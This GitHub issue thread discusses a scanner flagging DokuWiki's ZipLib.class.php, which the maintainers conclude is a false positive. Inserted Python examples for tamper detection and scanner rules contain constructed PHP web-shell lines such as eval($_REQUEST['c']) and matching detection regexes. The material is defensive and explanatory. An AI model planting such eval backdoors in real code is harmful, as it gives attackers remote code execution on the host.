cPanel 11.52.2.4 found "malicious" strings at /inc/ZipLib.class.php #1516

Closed
miguelmenendez opened this issue Apr 3, 2016 · 6 comments

@miguelmenendez

cPanel 11.52.2.4 found "malicious" strings at /inc/ZipLib.class.php

For DokuWiki 2015-08-10a "Detritus" & 2016-04-02 "snapshot".

PHP-EVAL_REQUEST-augq.UNOFFICIAL FOUND

cPanel blocks outbound ports 80, 443, 587 and 465 for all accounts hosting DokuWiki.

No more info.

@Klap-in
Collaborator

Klap-in commented Apr 3, 2016

This is the file you mentioned: https://github.com/splitbrain/dokuwiki/blob/master/inc/ZipLib.class.php
I don't see anything remarkable in it. Do you have pointers to where the issue should be?

Are you sure you still have the original files on the server? (don't compare dates, but compare the files with a newly downloaded version)
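The file comparison suggested above, as an added example that is not part of the DokuWiki project or of this thread: it hashes every file under an installed tree and under a freshly downloaded reference tree with SHA-256 and reports what was modified, added or is missing. The two directory trees are constructed in a temporary directory so the script runs offline; the file names and contents in them are made up for the example.

```python
"""Compare an installed DokuWiki tree against a freshly downloaded copy.

Added example, not DokuWiki project code. Assumes two directory trees on
disk; the sample trees below are constructed in a temporary directory.
"""
import hashlib
import os
import tempfile
from pathlib import Path


def sha256_file(path: Path) -> str:
    """Stream the file through SHA-256 so large files do not load into memory."""
    h = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def hash_tree(root: Path) -> dict:
    """Map each relative (POSIX-style) file path under root to its digest."""
    digests = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            full = Path(dirpath) / name
            digests[full.relative_to(root).as_posix()] = sha256_file(full)
    return digests


def compare_trees(installed: Path, reference: Path) -> dict:
    """Classify files as modified, added (not in reference) or missing (not installed).

    A scanner hit on a file that hashes identically to the pristine download is
    a problem with the scanner's rule, not evidence that the install was changed;
    the modified and added lists are where a real injection would show up.
    """
    inst = hash_tree(installed)
    ref = hash_tree(reference)
    return {
        "modified": sorted(p for p in inst if p in ref and inst[p] != ref[p]),
        "added": sorted(p for p in inst if p not in ref),
        "missing": sorted(p for p in ref if p not in inst),
        "unchanged": sorted(p for p in inst if p in ref and inst[p] == ref[p]),
    }


def build_sample_trees(base: Path) -> tuple:
    """Construct a reference tree and an installed tree that differ in three ways (constructed data)."""
    ref = base / "reference"
    inst = base / "installed"
    for root in (ref, inst):
        (root / "inc").mkdir(parents=True)
    # identical in both copies, the expected state for inc/ZipLib.class.php on a clean install
    (ref / "inc" / "ZipLib.class.php").write_text("<?php\nclass ZipLib {}\n")
    (inst / "inc" / "ZipLib.class.php").write_text("<?php\nclass ZipLib {}\n")
    # constructed tamper: one extra line appended on the server copy
    (ref / "inc" / "init.php").write_text("<?php\n// pristine\n")
    (inst / "inc" / "init.php").write_text("<?php\n// pristine\neval($_REQUEST['c']);\n")
    # file that exists only on the server
    (inst / "inc" / "cache_helper.php").write_text("<?php\n")
    # file shipped in the download but deleted on the server
    (ref / "README").write_text("DokuWiki\n")
    return inst, ref


def run_sample() -> dict:
    """Build the constructed trees in a temp dir and return the comparison."""
    with tempfile.TemporaryDirectory() as tmp:
        inst, ref = build_sample_trees(Path(tmp))
        return compare_trees(inst, ref)


if __name__ == "__main__":
    for kind, paths in run_sample().items():
        print(f"{kind}: {paths}")
```

Against a real install, point `compare_trees` at the web root and at an unpacked copy of the same release from download.dokuwiki.org; anything under `data/` or `conf/` will legitimately differ, so read those lists with that in mind.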

@Klap-in
Collaborator

Klap-in commented Apr 18, 2016

@miguelmenendez:

  • Do you have more info about this?
  • From where do you have your download of DokuWiki?

Is there anything that has to be checked from our side?
Are the downloads at download.dokuwiki.org generated directly from git?

@chinnz25

My hosting provider is also issuing such a warning & blocked port 80. I am updating via Softaculous!
Below I have attached the Screenshots.

[Screenshot: email notification]
[Screenshot: cPanel]

@Klap-in
Collaborator

Klap-in commented Jul 17, 2016

You are sure that your inc/ZipLib.class.php is exactly the same as https://github.com/splitbrain/dokuwiki/blob/master/inc/ZipLib.class.php ?

If the code is equal to our code, could you ask the support team that sent you this message if they can tell which part of the code is triggering this warning in the scan?
So far we know our code is correct and not malicious. So the big question is: what does this scan not like?

@brianoflan

brianoflan commented Aug 22, 2016

I have seen this same error from hosting sites that scan files with SiteLock:

inc/ZipLib.class.php: SiteLock-PHP-EVAL_REQUEST-auht.UNOFFICIAL FOUND

(The suffix after SiteLock-PHP-EVAL_REQUEST- varies, augq or auht or ete and so on.)

By its name it seems like it would have something to do with https://www.owasp.org/index.php/Direct_Dynamic_Code_Evaluation_('Eval_Injection')
but nothing close to the examples listed there match this file.

It seems clear that it is a false positive, either from the strings of hex/binary data - or else from having the gzinflate function in it at all (per https://blog.sitelock.com/2016/08/how-to-look-for-malware-in-your-databases/ ?) - or from who-knows-what. The SiteLock scan doesn't offer a line number or specifics - and most admins running a hosting site will just ask you to remove the ZipLib.class.php file (they don't know how SiteLock works; they just run it and tell their customers they've been "hacked").

https://blog.sitelock.com/2012/08/how-to-find-injected-malware-in-a-wordpress-website/
https://blog.sitelock.com/2015/03/malware-uncovered-what-infecting-a-website-actually-looks-like/
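The comment above guesses that the scanner fires on the mere presence of gzinflate or on hex/binary string tables. The following is an added illustration, written for this page and not SiteLock's actual signature logic (which nobody in the thread has seen) nor DokuWiki code: it contrasts a crude rule that flags any file mentioning the usual eval/decode functions with a rule that only fires when eval() is fed, possibly through decode wrappers, from a request superglobal, which is what a name like "PHP-EVAL_REQUEST" suggests. Both PHP snippets are constructed for the example; the class name `Inflater` and the regular expressions are assumptions of the example.

```python
"""Why a string-matching scanner can flag a benign decompression helper.

Added example: a hypothetical crude rule versus a hypothetical contextual rule,
not the real SiteLock signature and not DokuWiki code. Both PHP inputs are
constructed here so the script runs offline.
"""
import re

# Constructed: a legitimate helper that inflates archive members, with a
# hex table that looks like "binary" data to a naive string scanner.
BENIGN_PHP = r"""<?php
class Inflater {
    private $crc_table = array(0x00000000, 0x77073096, 0xEE0E612C);
    function extract_member($data) {
        return gzinflate($data);
    }
}
"""

# Constructed: the classic injected backdoor shape, code arriving via the request.
BACKDOOR_PHP = r"""<?php
eval(gzinflate(base64_decode($_REQUEST['c'])));
"""

# Crude rule: any of the usual suspects being called anywhere in the file.
CRUDE_RULE = re.compile(r"\b(eval|gzinflate|base64_decode|str_rot13)\s*\(")

# Contextual rule: eval( whose argument, after zero or more decode/inflate
# wrappers, is a request superglobal.
CONTEXTUAL_RULE = re.compile(
    r"\beval\s*\(\s*(?:(?:gzinflate|gzuncompress|base64_decode|str_rot13)\s*\(\s*)*"
    r"\$_(?:REQUEST|GET|POST|COOKIE)\b"
)


def crude_scan(src: str) -> list:
    """Return the function names the crude rule matched, in file order."""
    return [m.group(1) for m in CRUDE_RULE.finditer(src)]


def contextual_scan(src: str) -> bool:
    """True only when eval() is fed (possibly via decoders) from request input."""
    return CONTEXTUAL_RULE.search(src) is not None


def classify(src: str) -> dict:
    """Run both rules over one PHP source string and report the verdicts."""
    hits = crude_scan(src)
    return {
        "crude_hits": hits,
        "crude_flagged": bool(hits),
        "contextual_flagged": contextual_scan(src),
    }


if __name__ == "__main__":
    for name, src in (("benign", BENIGN_PHP), ("backdoor", BACKDOOR_PHP)):
        print(name, classify(src))
```

The benign helper trips the crude rule on `gzinflate(` alone and passes the contextual rule; the backdoor trips both. A scanner that reports only a signature name, with no line number, gives the admin no way to tell which of the two cases they are looking at, which is why comparing the file against the pristine download is the more reliable check.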

@lpaulsen93
Collaborator

I understood that it is a false positive. Anyway, the root of the message seems to be the ZipLib. As it will be removed from DokuWiki with the next release "Frusterick Manners" maybe this issue can be closed?
